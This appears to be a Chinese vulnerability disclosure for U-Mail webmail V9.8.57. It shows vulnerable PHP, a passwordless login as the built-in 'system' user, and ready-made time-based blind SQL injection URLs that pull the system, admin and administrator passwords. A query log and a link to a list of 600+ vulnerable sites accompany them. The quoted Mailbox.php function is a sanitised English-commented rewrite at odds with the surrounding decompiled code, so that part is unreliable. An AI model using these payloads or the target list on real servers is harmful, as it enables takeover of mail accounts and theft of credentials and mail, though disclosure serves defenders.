1.邮件系统介绍
1)官方下载地址:http://**.**.**.**/html/downloads/
2)版本:最新版V9.8.57
3)测试环境:Windows Server 2003+IIS6.0+官方默认软件
4)使用案例:http://**.**.**.**/html/case/ OR Google "Powered by U-Mail"
漏洞代码 附600多url下载 链接: http://**.**.**.**/s/1nQRzo 密码: ld5k
/fast/oab/module/operates.php
code 区域 if ( ACTION == "save-to-pab" )
{
include_once( LIB_PATH."PAB.php" );
$PAB = PAB::getinstance( );
$maillist_id = trim( $_GET['maillist'] );
if ( $maillist_id )
{
$member_all = $Maillist->getMemberByMaillistID( $maillist_id, "Mailbox,FullName", 0 );
if ( !$member_all )
{
dump_json( array( "status" => TRUE, "message" => "" ) );
}
foreach ( $member_all as $member )
{
if ( !$PAB->getContactByMail( $user_id, $member['Mailbox'], "contact_id", 0 ) )
{
$data = array(
"user_id" => $user_id,
"fullname" => $member['FullName'],
"pref_email" => $member['Mailbox'],
"updated" => date( "Y-m-d H:i:s" )
);
$res = $PAB->add_contact( $data, 0 );
if ( !$res )
{
dump_json( array( "status" => FALSE, "message" => "添加联系人时发生错误,添加失败!" ) );
}
}
}
}
else
{//不提交maillist,进入
$user_ids = trim( $_GET['userlist'] );
if ( !$user_ids )
{
dump_msg( "param_error", "参数错误!" );
}
$where = "t1.UserID IN (".$user_ids.")";无单引号,产生注入
$arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );
$user_all = $arr_tmp['data'];
if ( !$user_all )
{
dump_json( array( "status" => TRUE, "message" => "" ) );
}
函数文件
/admin/lib/Mailbox.php代码
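/**
 * Select mailbox rows (joined with the per-user info table) for one domain,
 * with optional extra condition, ordering and pagination.
 *
 * The positional signature is unchanged from the original; only the
 * decompiler-obfuscated parameter names have been given readable names.
 * Callers pass (domainId, where, page, pageSize, orderBy, desc, debug).
 *
 * @param int|string $domainId Domain owning the mailboxes; cast to int before use.
 * @param string     $where    Extra SQL condition ANDed onto the base filter.
 *                             SECURITY: this string is interpolated into the
 *                             query verbatim, so it must be built only from
 *                             values the caller has already cast or
 *                             whitelisted (e.g. a comma-separated list of
 *                             intval()ed ids). Passing request input through
 *                             unchanged makes the query injectable; the
 *                             method cannot detect that on its own.
 * @param int|string $page     1-based page number; only used when $pageSize is set.
 * @param int|string $pageSize Rows per page; empty or 0 means no LIMIT clause.
 * @param string     $orderBy  ORDER BY expression. Restricted here to identifier
 *                             characters, dots, commas and whitespace; anything
 *                             else falls back to the default ordering.
 * @param bool       $desc     Append DESC to the caller-supplied ORDER BY column.
 * @param bool       $debug    When true, dump() the final SQL before executing it.
 *
 * @return array{count: mixed, data: mixed} "count" is db_count() of the
 *         unpaginated query, "data" is db_select() of the paginated one.
 */
public function getMailboxInfo( $domainId, $where = "", $page = "", $pageSize = "", $orderBy = "", $desc = FALSE, $debug = FALSE )
{
    $domainId = intval( $domainId );
    $condition = "t1.DomainID='".$domainId."' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0";
    if ( $where )
    {
        // Raw concatenation: the safety of this fragment is entirely the
        // caller's responsibility (see the @param note above).
        $condition .= " AND ".$where;
    }

    // Pagination. Both values are cast to int so the LIMIT clause can only
    // ever contain digits. The original left the offset and limit variables
    // undefined on some paths (E_NOTICE plus a dangling " " on the query);
    // they are initialised explicitly here.
    $limitClause = "";
    $pageSize = intval( $pageSize );
    if ( $pageSize )
    {
        $offset = 0;
        $page = intval( $page );
        if ( $page )
        {
            $offset = $page * $pageSize - $pageSize;
        }
        $limitClause = $offset ? "LIMIT ".$offset.",".$pageSize : "LIMIT ".$pageSize;
    }

    // Ordering. Only identifier characters, dots, commas and whitespace are
    // accepted, which is enough for "t1.Mailbox" or "t1.OrderNo DESC" but
    // rejects quotes, parentheses and operators, so ORDER BY cannot be used
    // to smuggle SQL. Anything else uses the default ordering.
    if ( $orderBy && preg_match( '/^[A-Za-z0-9_.,\s]+\z/', $orderBy ) )
    {
        $orderClause = "ORDER BY ".$orderBy;
        if ( $desc )
        {
            $orderClause .= " DESC";
        }
        $orderClause .= ",t1.FullName ASC";
    }
    else
    {
        $orderClause = "ORDER BY t1.OrderNo DESC,t1.Mailbox ASC";
    }

    // The count query is the unpaginated statement; the data query adds LIMIT.
    $countSql = "SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*\r\n\t\t\t\tFROM ".$this->get_table_name( "mailbox" )." as t1, ".$this->get_table_name( "info" )." as t2\r\n\t\t\t\tWHERE ".$condition."\r\n\t\t\t\t".$orderClause;
    $dataSql = $limitClause === "" ? $countSql : $countSql." ".$limitClause;
    if ( $debug )
    {
        dump( $dataSql );
    }

    $count = $this->db_count( $countSql );
    $rows = $this->db_select( $dataSql, "more" );
    return array(
        "count" => $count,
        "data" => $rows
    );
}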
无需登录的原因是,邮箱系统自带名为 system 的默认用户,而该登录接口并未验证用户密码:只要提交用户名,即视为登录成功,之后可进行一系列操作。首先执行
http://**.**.**.**/webmail/fast/index.php?module=operate&action=login 向其post如下数据mailbox=system@**.**.**.**&link=?
如图,登录成功,虽然页面不显示,但所有的函数都可以执行
然后执行,
http://**.**.**.**/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from userlist where FullName=0x73797374656D),1,1))=97,sleep(5),1)
执行的sql语句为
150121 20:11:25 2263 Connect umail@localhost on
2263 Query SET NAMES 'UTF8'
2263 Init DB umail
2263 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (if(ascii(substr((select password from userlist where FullName=0x73797374656D),1,1))=97,sleep(5),1))
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
查看响应
然后读取管理员密码,即可对所有用户及邮件操作,管理表为web_usr
exp中不能引入单引号,所以读取admin 和administrator的exp分别为
http://**.**.**.**/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from web_usr where role_code=1),1,1))=97,sleep(5),1)
http://**.**.**.**/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from userlist where role_code=2),1,1))=97,sleep(5),1)